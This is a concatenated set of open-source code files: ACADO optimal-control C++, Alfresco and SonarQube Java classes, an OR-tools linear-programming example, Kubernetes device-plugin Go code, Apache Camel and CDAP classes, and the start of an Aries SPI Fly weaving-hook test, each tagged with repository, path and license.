* PLEASE CALL THIS FUNTION AT MOST ONES FOR AN EXPRESSION \n
* AS A KIND OF INIT ROUTINE. \n
* \n
* \return the name of the expression. \n
*/
virtual returnValue loadIndices( SymbolicIndexList *indexList /**< The index list to be
* filled with entries */ );
/** Return the value of the constant */
virtual double getValue() const;
/** Returns the argument or NULL if no intermediate argument available */
virtual Operator* passArgument() const;
/** Asks whether all elements are purely symbolic. \n
* \n
* \return BT_TRUE if the complete tree is symbolic. \n
* BT_FALSE otherwise (e.g. if C functions are linked). \n
*/
virtual BooleanType isSymbolic() const;
int nCount;
//
// PROTECTED FUNCTIONS:
//
protected:
};
CLOSE_NAMESPACE_ACADO
#endif
| rienq/acado | acado/symbolic_operator/nonsmooth_operator.hpp | C++ | lgpl-3.0 | 23,173 |
/*
* This file is part of ACADO Toolkit.
*
* ACADO Toolkit -- A Toolkit for Automatic Control and Dynamic Optimization.
* Copyright (C) 2008-2014 by Boris Houska, Hans Joachim Ferreau,
* Milan Vukov, Rien Quirynen, KU Leuven.
* Developed within the Optimization in Engineering Center (OPTEC)
* under supervision of Moritz Diehl. All rights reserved.
*
* ACADO Toolkit is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 3 of the License, or (at your option) any later version.
*
* ACADO Toolkit is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with ACADO Toolkit; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
/**
* \file examples/multi_objective/car_nbi.cpp
* \author Filip Logist, Boris Houska, Hans Joachim Ferreau
* \date 2009
*
* Normal Boundary Intersection for a car example with conflicting time and energy cost
* J1 = int_0^T max(0.0,u)dt
* J2 = T
* due to symmetry u_min = -u_max only half the time interval is simulated
* [O.0,t1] = [0.0,t1/2.0]
*
* Reference:
* P. Van Erdeghem, F. Logist, I. Smets, and J. Van Impe 2008.
* Improved procedures for multiple objective optimal control problems.
* In: Proceedings of the 17th IFAC World Congress, 7802-7807, Seoul (Korea)
*
*/
// IMPLEMENTATION:
// ---------------
#include <acado_optimal_control.hpp>
#include <acado_gnuplot.hpp>
/* >>> start tutorial code >>> */
int main( ){
USING_NAMESPACE_ACADO
// INTRODUCE THE VARIABLES:
// ----------------------------
DifferentialState x1,x2;
Control u ;
Parameter t1 ;
DifferentialEquation f(0.0,t1);
// DEFINE A DIFFERENTIAL EQUATION:
// -------------------------------
f << dot(x1) == x2;
f << dot(x2) == u;
// DEFINE AN OPTIMAL CONTROL PROBLEM:
// ----------------------------------
OCP ocp(0.0,t1,25);
ocp.minimizeMayerTerm( 0, x2 );
ocp.minimizeMayerTerm( 1, 2.0*t1/20.0);
ocp.subjectTo( f );
ocp.subjectTo( AT_START, x1 == 0.0 );
ocp.subjectTo( AT_START, x2 == 0.0 );
ocp.subjectTo( AT_END , x1 == 200.0 );
ocp.subjectTo( 0.0 <= x1 <= 200.0001 );
ocp.subjectTo( 0.0 <= x2 <= 40.0 );
ocp.subjectTo( 0.0 <= u <= 5.0 );
ocp.subjectTo( 0.1 <= t1 <= 50.0 );
// DEFINE A MULTI-OBJECTIVE ALGORITHM AND SOLVE THE OCP:
// -----------------------------------------------------
MultiObjectiveAlgorithm algorithm(ocp);
algorithm.set( PARETO_FRONT_DISCRETIZATION, 11 );
algorithm.set( PARETO_FRONT_GENERATION, PFG_NORMAL_BOUNDARY_INTERSECTION );
algorithm.set( KKT_TOLERANCE, 1e-8 );
// Minimize individual objective function
algorithm.solveSingleObjective(0);
// Minimize individual objective function
algorithm.solveSingleObjective(1);
// Generate Pareto set
algorithm.solve();
algorithm.getWeights("car_nbi_weights.txt");
algorithm.getAllDifferentialStates("car_nbi_states.txt");
algorithm.getAllControls("car_nbi_controls.txt");
algorithm.getAllParameters("car_nbi_parameters.txt");
// GET THE RESULT FOR THE PARETO FRONT AND PLOT IT:
// ------------------------------------------------
VariablesGrid paretoFront;
algorithm.getParetoFront( paretoFront );
GnuplotWindow window1;
window1.addSubplot( paretoFront, "Pareto Front (time versus energy)", "ENERGY","TIME", PM_POINTS );
window1.plot( );
// PRINT INFORMATION ABOUT THE ALGORITHM:
// --------------------------------------
algorithm.printInfo();
// SAVE INFORMATION:
// -----------------
paretoFront.print( "car_nbi_pareto.txt" );
return 0;
}
/* <<< end tutorial code <<< */
| rienq/acado | examples/multi_objective/car_nbi.cpp | C++ | lgpl-3.0 | 4,278 |
/*
* This file is part of ACADO Toolkit.
*
* ACADO Toolkit -- A Toolkit for Automatic Control and Dynamic Optimization.
* Copyright (C) 2008-2014 by Boris Houska, Hans Joachim Ferreau,
* Milan Vukov, Rien Quirynen, KU Leuven.
* Developed within the Optimization in Engineering Center (OPTEC)
* under supervision of Moritz Diehl. All rights reserved.
*
* ACADO Toolkit is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 3 of the License, or (at your option) any later version.
*
* ACADO Toolkit is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with ACADO Toolkit; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
/**
* \file include/acado/matrix_vector/matrix_vector_tools.hpp
* \author Milan Vukov
* \date 2013
*/
#ifndef ACADO_TOOLKIT_MATRIX_VECTOR_TOOLS_HPP
#define ACADO_TOOLKIT_MATRIX_VECTOR_TOOLS_HPP
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wshadow"
#pragma GCC diagnostic ignored "-Wfloat-equal"
#include <external_packages/eigen3/Eigen/Dense>
#pragma GCC diagnostic pop
#endif // ACADO_TOOLKIT_MATRIX_VECTOR_TOOLS_HPP
| rienq/acado | acado/matrix_vector/matrix_vector_tools.hpp | C++ | lgpl-3.0 | 1,612 |
/*
* #%L
* Alfresco Repository
* %%
* Copyright (C) 2005 - 2016 Alfresco Software Limited
* %%
* This file is part of the Alfresco software.
* If the software was purchased under a paid Alfresco license, the terms of
* the paid license agreement will prevail. Otherwise, the software is
* provided under the following open source license terms:
*
* Alfresco is free software: you can redistribute it and/or modify
* it under the terms of the GNU Lesser General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* Alfresco is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public License
* along with Alfresco. If not, see <http://www.gnu.org/licenses/>.
* #L%
*/
package org.alfresco.repo.management.subsystems;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Map;
import java.util.concurrent.locks.ReentrantReadWriteLock;
import org.aopalliance.intercept.MethodInterceptor;
import org.aopalliance.intercept.MethodInvocation;
import org.springframework.aop.framework.ProxyFactoryBean;
import org.springframework.aop.support.DefaultPointcutAdvisor;
import org.springframework.beans.BeansException;
import org.springframework.beans.factory.NoSuchBeanDefinitionException;
import org.springframework.context.ApplicationContext;
import org.springframework.context.ApplicationContextAware;
/**
* A factory bean, normally used in conjunction with {@link ChildApplicationContextFactory} allowing selected
* interfaces in a child application context to be proxied by a bean in the parent application context. This allows
* 'hot-swapping' and reconfiguration of entire subsystems.
*/
public class SubsystemProxyFactory extends ProxyFactoryBean implements ApplicationContextAware
{
private static final long serialVersionUID = -4186421942840611218L;
/** The source application context factory. */
private ApplicationContextFactory sourceApplicationContextFactory;
private String sourceApplicationContextFactoryName;
private ApplicationContext applicationContext;
/** An optional bean name to look up in the source application context **/
private String sourceBeanName;
private ReentrantReadWriteLock lock = new ReentrantReadWriteLock();
private ApplicationContext context;
private Object sourceBean;
private Object defaultBean;
private Map <Class<?>, Object> typedBeans = new HashMap<Class<?>, Object>(7);
/**
* Instantiates a new managed subsystem proxy factory.
*/
public SubsystemProxyFactory()
{
addAdvisor(new DefaultPointcutAdvisor(new MethodInterceptor()
{
public Object invoke(MethodInvocation mi) throws Throwable
{
Method method = mi.getMethod();
try
{
return method.invoke(locateBean(mi), mi.getArguments());
}
catch (InvocationTargetException e)
{
// Unwrap invocation target exceptions
throw e.getTargetException();
}
}
}));
}
@SuppressWarnings("unchecked")
@Override
public void setInterfaces(Class[] interfaces)
{
super.setInterfaces(interfaces);
// Make it possible to export the object via JMX
setTargetClass(getObjectType());
}
/**
* Sets the source application context factory by name.
*
* @param sourceApplicationContextFactoryName
* the name of the sourceApplicationContextFactory to set
*/
public void setSourceApplicationContextFactoryName(String sourceApplicationContextFactoryName)
{
this.sourceApplicationContextFactoryName = sourceApplicationContextFactoryName;
}
/**
* Sets the source application context factory by reference
*
* @param sourceApplicationContextFactory
* the sourceApplicationContextFactory to set
*/
public void setSourceApplicationContextFactory(ApplicationContextFactory sourceApplicationContextFactory)
{
this.sourceApplicationContextFactory = sourceApplicationContextFactory;
}
private ApplicationContextFactory getSourceApplicationContextFactory()
{
if (sourceApplicationContextFactory != null)
{
return sourceApplicationContextFactory;
}
else
{
try
{
return applicationContext.getBean(sourceApplicationContextFactoryName, ApplicationContextFactory.class);
} catch (NoSuchBeanDefinitionException e)
{
return null;
}
}
}
@Override
public void setApplicationContext(ApplicationContext applicationContext) throws BeansException
{
this.applicationContext = applicationContext;
}
/**
* Sets an optional bean name to target all calls to in the source application context. If not set, an appropriate
* bean is looked up based on method class.
*
* @param sourceBeanName
* the sourceBeanName to set
*/
public void setSourceBeanName(String sourceBeanName)
{
this.sourceBeanName = sourceBeanName;
}
/**
* Sets an optional default bean to be used if the target bean is not found. Generally used when a subsystem does not
* exist.
*
* @param defaultBean
* the defaultBean to set
*/
public void setDefaultBean(Object defaultBean)
{
this.defaultBean = defaultBean;
}
// Bring our cached copies of the source beans in line with the application context factory, using a RW lock to
// ensure consistency
protected Object locateBean(MethodInvocation mi)
{
boolean haveWriteLock = false;
this.lock.readLock().lock();
try
{
ApplicationContextFactory sourceApplicationContextFactory = getSourceApplicationContextFactory();
if (sourceApplicationContextFactory != null)
{
ApplicationContext newContext = sourceApplicationContextFactory.getApplicationContext();
if (this.context != newContext)
{
// Upgrade the lock
this.lock.readLock().unlock();
this.lock.writeLock().lock();
haveWriteLock = true;
newContext = sourceApplicationContextFactory.getApplicationContext();
this.context = newContext;
this.typedBeans.clear();
this.sourceBean = null;
if (this.sourceBeanName != null)
{
this.sourceBean = newContext.getBean(this.sourceBeanName);
}
}
if (this.sourceBean == null)
{
Method method = mi.getMethod();
Class<?> type = method.getDeclaringClass();
Object bean = this.typedBeans.get(type);
if (bean == null)
{
// Upgrade the lock if necessary
if (!haveWriteLock)
{
this.lock.readLock().unlock();
this.lock.writeLock().lock();
haveWriteLock = true;
}
bean = this.typedBeans.get(type);
if (bean == null)
{
Map<?, ?> beans = this.context.getBeansOfType(type);
if (beans.size() == 0 && defaultBean != null)
{
bean = defaultBean;
}
else
{
if (beans.size() != 1)
{
throw new RuntimeException("Don't know where to route call to method " + method);
}
bean = beans.values().iterator().next();
this.typedBeans.put(type, bean);
}
}
}
return bean;
}
return this.sourceBean;
}
else
{
return defaultBean;
}
}
finally
{
if (haveWriteLock)
{
this.lock.writeLock().unlock();
}
else
{
this.lock.readLock().unlock();
}
}
}
}
| Alfresco/alfresco-repository | src/main/java/org/alfresco/repo/management/subsystems/SubsystemProxyFactory.java | Java | lgpl-3.0 | 9,452 |
/*
* SonarQube, open source software quality management tool.
* Copyright (C) 2008-2014 SonarSource
* mailto:contact AT sonarsource DOT com
*
* SonarQube is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 3 of the License, or (at your option) any later version.
*
* SonarQube is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public License
* along with this program; if not, write to the Free Software Foundation,
* Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
*/
package selenium;
import com.google.common.base.Predicate;
import com.google.common.base.Supplier;
import org.openqa.selenium.InvalidElementStateException;
import org.openqa.selenium.NotFoundException;
import org.openqa.selenium.StaleElementReferenceException;
import org.openqa.selenium.WebDriverException;
import java.util.NoSuchElementException;
import java.util.concurrent.TimeUnit;
import static java.util.concurrent.TimeUnit.SECONDS;
class Retry {
public static final Retry _30_SECONDS = new Retry(30, SECONDS);
private final long timeoutInMs;
Retry(long duration, TimeUnit timeUnit) {
this.timeoutInMs = timeUnit.toMillis(duration);
}
<T> void execute(Supplier<Optional<T>> target, Consumer<T> action) {
WebDriverException lastError = null;
boolean retried = false;
long start = System.currentTimeMillis();
while ((System.currentTimeMillis() - start) < timeoutInMs) {
try {
Optional<T> targetElement = target.get();
if (targetElement.isPresent()) {
action.accept(targetElement.get());
if (retried) {
System.out.println();
}
return;
}
} catch (StaleElementReferenceException e) {
// ignore
} catch (WebDriverException e) {
lastError = e;
}
retried = true;
System.out.print(".");
}
if (retried) {
System.out.println();
}
if (lastError != null) {
throw lastError;
}
throw new NoSuchElementException("Not found");
}
<T> void execute(Runnable action) {
WebDriverException lastError = null;
boolean retried = false;
long start = System.currentTimeMillis();
while ((System.currentTimeMillis() - start) < timeoutInMs) {
try {
action.run();
if (retried) {
System.out.println();
}
return;
} catch (StaleElementReferenceException e) {
// ignore
} catch (WebDriverException e) {
lastError = e;
}
retried = true;
System.out.print(".");
}
if (retried) {
System.out.println();
}
if (lastError != null) {
throw lastError;
}
throw new NoSuchElementException("Not found");
}
<T> boolean verify(Supplier<T> targetSupplier, Predicate<T> predicate) throws NoSuchElementException {
Error error = Error.KO;
boolean retried = false;
long start = System.currentTimeMillis();
while ((System.currentTimeMillis() - start) < timeoutInMs) {
try {
if (predicate.apply(targetSupplier.get())) {
if (retried) {
System.out.println();
}
return true;
}
error = Error.KO;
} catch (InvalidElementStateException e) {
error = Error.KO;
} catch (NotFoundException e) {
error = Error.NOT_FOUND;
} catch (StaleElementReferenceException e) {
// ignore
}
retried = true;
System.out.print(".");
}
if (retried) {
System.out.println();
}
if (error == Error.NOT_FOUND) {
throw new NoSuchElementException("Not found");
}
return false;
}
enum Error {
NOT_FOUND, KO
}
}
| abbeyj/sonarqube | it/it-tests/src/test/java/selenium/Retry.java | Java | lgpl-3.0 | 4,076 |
/*
* #%L
* Alfresco Repository
* %%
* Copyright (C) 2005 - 2016 Alfresco Software Limited
* %%
* This file is part of the Alfresco software.
* If the software was purchased under a paid Alfresco license, the terms of
* the paid license agreement will prevail. Otherwise, the software is
* provided under the following open source license terms:
*
* Alfresco is free software: you can redistribute it and/or modify
* it under the terms of the GNU Lesser General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* Alfresco is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public License
* along with Alfresco. If not, see <http://www.gnu.org/licenses/>.
* #L%
*/
package org.alfresco.repo.security.authentication;
import org.alfresco.filesys.auth.ftp.FTPAuthenticatorBase;
import org.alfresco.jlan.ftp.FTPSrvSession;
import org.alfresco.jlan.server.auth.ClientInfo;
import java.util.List;
/**
* Base chaining FTP Authenticator class. Where appropriate, methods will 'chain' across multiple
* {@link FTPAuthenticatorBase} instances, as returned by {@link #getUsableFtpAuthenticators()}.
*
* @author alex.mukha
* @since 4.2.1
*/
public abstract class AbstractChainingFtpAuthenticator extends FTPAuthenticatorBase
{
@Override
public boolean authenticateUser(ClientInfo info, FTPSrvSession sess)
{
for (FTPAuthenticatorBase authenticator : getUsableFtpAuthenticators())
{
if (authenticator.authenticateUser(info, sess))
return true;
}
// authentication failed in all of the authenticators
return false;
}
/**
* Gets the FTP authenticators across which methods will chain.
*
* @return the usable FTP authenticators
*/
protected abstract List<FTPAuthenticatorBase> getUsableFtpAuthenticators();
}
| Alfresco/alfresco-repository | src/main/java/org/alfresco/repo/security/authentication/AbstractChainingFtpAuthenticator.java | Java | lgpl-3.0 | 2,217 |
/*
* #%L
* Alfresco Repository
* %%
* Copyright (C) 2005 - 2016 Alfresco Software Limited
* %%
* This file is part of the Alfresco software.
* If the software was purchased under a paid Alfresco license, the terms of
* the paid license agreement will prevail. Otherwise, the software is
* provided under the following open source license terms:
*
* Alfresco is free software: you can redistribute it and/or modify
* it under the terms of the GNU Lesser General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* Alfresco is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public License
* along with Alfresco. If not, see <http://www.gnu.org/licenses/>.
* #L%
*/
package org.alfresco.repo.search.impl.solr;
/**
* Identifies an attempt to use a disabled feature.
*
* @author Matt Ward
*/
public class DisabledFeatureException extends RuntimeException
{
private static final long serialVersionUID = 1L;
DisabledFeatureException(String message)
{
super(message);
}
} | Alfresco/alfresco-repository | src/main/java/org/alfresco/repo/search/impl/solr/DisabledFeatureException.java | Java | lgpl-3.0 | 1,375 |
# Copyright 2011 Hakan Kjellerstrand hakank@bonetmail.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Volsay problem in Google or-tools.
From the OPL model volsay.mod
Using arrays.
This model was created by Hakan Kjellerstrand (hakank@bonetmail.com)
Also see my other Google CP Solver models:
http://www.hakank.org/google_or_tools/
"""
from __future__ import print_function
from ortools.linear_solver import pywraplp
def main(unused_argv):
# Create the solver.
# using GLPK
# solver = pywraplp.Solver('CoinsGridGLPK',
# pywraplp.Solver.GLPK_LINEAR_PROGRAMMING)
# Using CLP
solver = pywraplp.Solver('CoinsGridCLP',
pywraplp.Solver.CLP_LINEAR_PROGRAMMING)
# data
num_products = 2
Gas = 0
Chloride = 1
products = ['Gas', 'Chloride']
# declare variables
production = [solver.NumVar(0, 100000, 'production[%i]' % i)
for i in range(num_products)]
#
# constraints
#
solver.Add(production[Gas] + production[Chloride] <= 50)
solver.Add(3 * production[Gas] + 4 * production[Chloride] <= 180)
# objective
objective = solver.Maximize(40 * production[Gas] + 50 * production[Chloride])
print('NumConstraints:', solver.NumConstraints())
#
# solution and search
#
solver.Solve()
print()
print('objective = ', solver.Objective().Value())
for i in range(num_products):
print(products[i], '=', production[i].SolutionValue(), end=' ')
print('ReducedCost = ', production[i].ReducedCost())
if __name__ == '__main__':
main('Volsay')
| WendellDuncan/or-tools | examples/python/volsay2.py | Python | apache-2.0 | 2,080 |
/*
Copyright 2017 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package deviceplugin
import (
"fmt"
"net"
"sync"
"time"
"github.com/golang/glog"
"golang.org/x/net/context"
"google.golang.org/grpc"
pluginapi "k8s.io/kubernetes/pkg/kubelet/apis/deviceplugin/v1alpha"
)
// endpoint maps to a single registered device plugin. It is responsible
// for managing gRPC communications with the device plugin and caching
// device states reported by the device plugin.
type endpoint interface {
run()
stop()
allocate(devs []string) (*pluginapi.AllocateResponse, error)
getDevices() []pluginapi.Device
callback(resourceName string, added, updated, deleted []pluginapi.Device)
}
type endpointImpl struct {
client pluginapi.DevicePluginClient
clientConn *grpc.ClientConn
socketPath string
resourceName string
devices map[string]pluginapi.Device
mutex sync.Mutex
cb monitorCallback
}
// newEndpoint creates a new endpoint for the given resourceName.
func newEndpointImpl(socketPath, resourceName string, devices map[string]pluginapi.Device, callback monitorCallback) (*endpointImpl, error) {
client, c, err := dial(socketPath)
if err != nil {
glog.Errorf("Can't create new endpoint with path %s err %v", socketPath, err)
return nil, err
}
return &endpointImpl{
client: client,
clientConn: c,
socketPath: socketPath,
resourceName: resourceName,
devices: devices,
cb: callback,
}, nil
}
func (e *endpointImpl) callback(resourceName string, added, updated, deleted []pluginapi.Device) {
e.cb(resourceName, added, updated, deleted)
}
func (e *endpointImpl) getDevices() []pluginapi.Device {
e.mutex.Lock()
defer e.mutex.Unlock()
var devs []pluginapi.Device
for _, d := range e.devices {
devs = append(devs, d)
}
return devs
}
// run initializes ListAndWatch gRPC call for the device plugin and
// blocks on receiving ListAndWatch gRPC stream updates. Each ListAndWatch
// stream update contains a new list of device states. listAndWatch compares the new
// device states with its cached states to get list of new, updated, and deleted devices.
// It then issues a callback to pass this information to the device manager which
// will adjust the resource available information accordingly.
func (e *endpointImpl) run() {
stream, err := e.client.ListAndWatch(context.Background(), &pluginapi.Empty{})
if err != nil {
glog.Errorf(errListAndWatch, e.resourceName, err)
return
}
devices := make(map[string]pluginapi.Device)
e.mutex.Lock()
for _, d := range e.devices {
devices[d.ID] = d
}
e.mutex.Unlock()
for {
response, err := stream.Recv()
if err != nil {
glog.Errorf(errListAndWatch, e.resourceName, err)
return
}
devs := response.Devices
glog.V(2).Infof("State pushed for device plugin %s", e.resourceName)
newDevs := make(map[string]*pluginapi.Device)
var added, updated []pluginapi.Device
for _, d := range devs {
dOld, ok := devices[d.ID]
newDevs[d.ID] = d
if !ok {
glog.V(2).Infof("New device for Endpoint %s: %v", e.resourceName, d)
devices[d.ID] = *d
added = append(added, *d)
continue
}
if d.Health == dOld.Health {
continue
}
if d.Health == pluginapi.Unhealthy {
glog.Errorf("Device %s is now Unhealthy", d.ID)
} else if d.Health == pluginapi.Healthy {
glog.V(2).Infof("Device %s is now Healthy", d.ID)
}
devices[d.ID] = *d
updated = append(updated, *d)
}
var deleted []pluginapi.Device
for id, d := range devices {
if _, ok := newDevs[id]; ok {
continue
}
glog.Errorf("Device %s was deleted", d.ID)
deleted = append(deleted, d)
delete(devices, id)
}
e.mutex.Lock()
// NOTE: Return a copy of 'devices' instead of returning a direct reference to local 'devices'
e.devices = make(map[string]pluginapi.Device)
for _, d := range devices {
e.devices[d.ID] = d
}
e.mutex.Unlock()
e.callback(e.resourceName, added, updated, deleted)
}
}
// allocate issues Allocate gRPC call to the device plugin.
func (e *endpointImpl) allocate(devs []string) (*pluginapi.AllocateResponse, error) {
return e.client.Allocate(context.Background(), &pluginapi.AllocateRequest{
DevicesIDs: devs,
})
}
func (e *endpointImpl) stop() {
e.clientConn.Close()
}
// dial establishes the gRPC communication with the registered device plugin. https://godoc.org/google.golang.org/grpc#Dial
func dial(unixSocketPath string) (pluginapi.DevicePluginClient, *grpc.ClientConn, error) {
c, err := grpc.Dial(unixSocketPath, grpc.WithInsecure(), grpc.WithBlock(),
grpc.WithTimeout(10*time.Second),
grpc.WithDialer(func(addr string, timeout time.Duration) (net.Conn, error) {
return net.DialTimeout("unix", addr, timeout)
}),
)
if err != nil {
return nil, nil, fmt.Errorf(errFailedToDialDevicePlugin+" %v", err)
}
return pluginapi.NewDevicePluginClient(c), c, nil
}
| lichen2013/kubernetes | pkg/kubelet/cm/deviceplugin/endpoint.go | GO | apache-2.0 | 5,390 |
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.camel.component.sparkrest;
import org.apache.camel.CamelContext;
import org.apache.camel.support.DefaultMessage;
import spark.Request;
import spark.Response;
/**
* Spark based {@link org.apache.camel.Message}.
* <p/>
* This implementation allows direct access to the Spark {@link Request} using
* the {@link #getRequest()} method.
*/
public class SparkMessage extends DefaultMessage {
private final transient Request request;
private final transient Response response;
public SparkMessage(CamelContext camelContext, Request request, Response response) {
super(camelContext);
this.request = request;
this.response = response;
}
public Request getRequest() {
return request;
}
public Response getResponse() {
return response;
}
@Override
public DefaultMessage newInstance() {
return new SparkMessage(getCamelContext(), request, response);
}
}
| ullgren/camel | components/camel-spark-rest/src/main/java/org/apache/camel/component/sparkrest/SparkMessage.java | Java | apache-2.0 | 1,767 |
/*
* Copyright © 2015 Cask Data, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
package co.cask.cdap.api.dataset.lib;
import co.cask.cdap.api.mapreduce.MapReduceTaskContext;
/**
* Responsible for dynamically determining a @{link PartitionKey}.
* For each K, V pair, the getPartitionKey(K, V) method is called to determine a PartitionKey.
*
* @param <K> Type of key
* @param <V> Type of value
*/
public abstract class DynamicPartitioner<K, V> {
/**
* Initializes a DynamicPartitioner.
* <p>
* This method will be called only once per {@link DynamicPartitioner} instance. It is the first method call
* on that instance.
* </p>
* @param mapReduceTaskContext the mapReduceTaskContext for the task that this DynamicPartitioner is running in.
* Note that the hadoop context is not available on this MapReduceTaskContext.
*/
public void initialize(MapReduceTaskContext<K, V> mapReduceTaskContext) {
// do nothing by default
}
/**
* Destroys a DynamicPartitioner.
* <p>
* This method will be called only once per {@link DynamicPartitioner} instance. It is the last method call
* on that instance.
* </p>
*/
public void destroy() {
// do nothing by default
}
/**
* Determine the PartitionKey for the key-value pair to be written to.
*
* @param key the key to be written
* @param value the value to be written
* @return the {@link PartitionKey} for the key-value pair to be written to.
*/
public abstract PartitionKey getPartitionKey(K key, V value);
}
| chtyim/cdap | cdap-api/src/main/java/co/cask/cdap/api/dataset/lib/DynamicPartitioner.java | Java | apache-2.0 | 2,078 |
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.aries.spifly.dynamic;
import java.io.BufferedReader;
import java.io.File;
import java.io.FileReader;
import java.io.IOException;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.net.URL;
import java.net.URLClassLoader;
import java.security.ProtectionDomain;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collection;
import java.util.Collections;
import java.util.Dictionary;
import java.util.Enumeration;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Hashtable;
import java.util.List;
import java.util.Map;
import java.util.Set;
import java.util.concurrent.ConcurrentHashMap;
import javax.xml.parsers.DocumentBuilderFactory;
import org.apache.aries.spifly.BaseActivator;
import org.apache.aries.spifly.SpiFlyConstants;
import org.apache.aries.spifly.Streams;
import org.easymock.EasyMock;
import org.easymock.IAnswer;
import org.junit.After;
import org.junit.Assert;
import org.junit.Before;
import org.junit.Test;
import org.osgi.framework.Bundle;
import org.osgi.framework.BundleContext;
import org.osgi.framework.BundleReference;
import org.osgi.framework.Version;
import org.osgi.framework.hooks.weaving.WeavingHook;
import org.osgi.framework.hooks.weaving.WovenClass;
import org.osgi.framework.wiring.BundleRevision;
import org.osgi.framework.wiring.BundleWiring;
public class ClientWeavingHookTest {
DynamicWeavingActivator activator;
private static final String thisJVMsDBF = DocumentBuilderFactory.newInstance().getClass().getName();
@Before
public void setUp() {
activator = new DynamicWeavingActivator();
BaseActivator.activator = activator;
}
@After
public void tearDown() {
BaseActivator.activator = null;
activator = null;
}
@Test
public void testBasicServiceLoaderUsage() throws Exception {
Dictionary<String, String> consumerHeaders = new Hashtable<String, String>();
consumerHeaders.put(SpiFlyConstants.SPI_CONSUMER_HEADER, "*");
// Register the bundle that provides the SPI implementation.
Bundle providerBundle = mockProviderBundle("impl1", 1);
activator.registerProviderBundle("org.apache.aries.mytest.MySPI", providerBundle, new HashMap<String, Object>());
Bundle consumerBundle = mockConsumerBundle(consumerHeaders, providerBundle);
activator.addConsumerWeavingData(consumerBundle, SpiFlyConstants.SPI_CONSUMER_HEADER);
Bundle spiFlyBundle = mockSpiFlyBundle("spifly", Version.parseVersion("1.9.4"), consumerBundle, providerBundle);
